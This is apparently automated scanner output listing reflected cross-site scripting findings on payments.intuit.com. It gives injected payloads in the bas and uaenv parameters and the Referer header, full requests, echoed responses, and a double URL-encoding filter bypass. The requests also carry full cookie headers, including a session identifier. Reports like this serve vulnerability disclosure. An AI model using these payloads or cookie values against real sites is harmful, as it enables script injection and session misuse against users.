The value of the bas request parameter is copied into a JavaScript rest-of-line comment. The payload 5917f%0aalert(1)//0f2714cf68b was submitted in the bas parameter. This input was echoed as 5917f alert(1)//0f2714cf68b in the application's response: the %0a was decoded to a line break, which terminates the comment so that the remainder is executed as code.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=card5917f%0aalert(1)//0f2714cf68b HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The value of the bas request parameter is copied into an HTML comment. The payload d670a--><script>alert(1)</script>afe168cf1c was submitted in the bas parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=cardd670a--><script>alert(1)</script>afe168cf1c HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The value of the bas request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd42"><script>alert(1)</script>c5a639cbe3e was submitted in the bas parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod&bas=cardfbd42"><script>alert(1)</script>c5a639cbe3e HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The value of the uaenv request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 100cc'%3balert(1)//21604655727 was submitted in the uaenv parameter. This input was echoed as 100cc';alert(1)//21604655727 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod100cc'%3balert(1)//21604655727&bas=card HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The value of the uaenv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5165"%3balert(1)//11b088fde41 was submitted in the uaenv parameter. This input was echoed as c5165";alert(1)//11b088fde41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prodc5165"%3balert(1)//11b088fde41&bas=card HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5deb3%2527%252dalert%25281%2529%252d%2527ae164b743d5 was submitted in the Referer HTTP header. This input was echoed as 5deb3'-alert(1)-'ae164b743d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
...[SNIP]...
<script>
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = '5deb3'-alert(1)-'ae164b743d5';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload b9588--><script>alert(1)</script>36da4f0cb8f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ea6a'-alert(1)-'22e1363c582 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=1ea6a'-alert(1)-'22e1363c582
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=1ea6a'-alert(1)-'22e1363c582';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11fdb'-alert(1)-'203a332f69f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=11fdb'-alert(1)-'203a332f69f
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=11fdb'-alert(1)-'203a332f69f';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 38475--><script>alert(1)</script>4d6c73c632 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=38475--><script>alert(1)</script>4d6c73c632
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74fca'-alert(1)-'5c9bded9b65 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=74fca'-alert(1)-'5c9bded9b65
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=74fca'-alert(1)-'5c9bded9b65';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload a8e31--><script>alert(1)</script>c61fa29957 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=a8e31--><script>alert(1)</script>c61fa29957
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a2b9'-alert(1)-'7fe9fab8e6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=6a2b9'-alert(1)-'7fe9fab8e6e
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=6a2b9'-alert(1)-'7fe9fab8e6e';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 23a44--><script>alert(1)</script>72e2675b5fc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=23a44--><script>alert(1)</script>72e2675b5fc
The value of the Referer HTTP header is copied into an HTML comment. The payload 50367--><script>alert(1)</script>6c1e00f3f20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
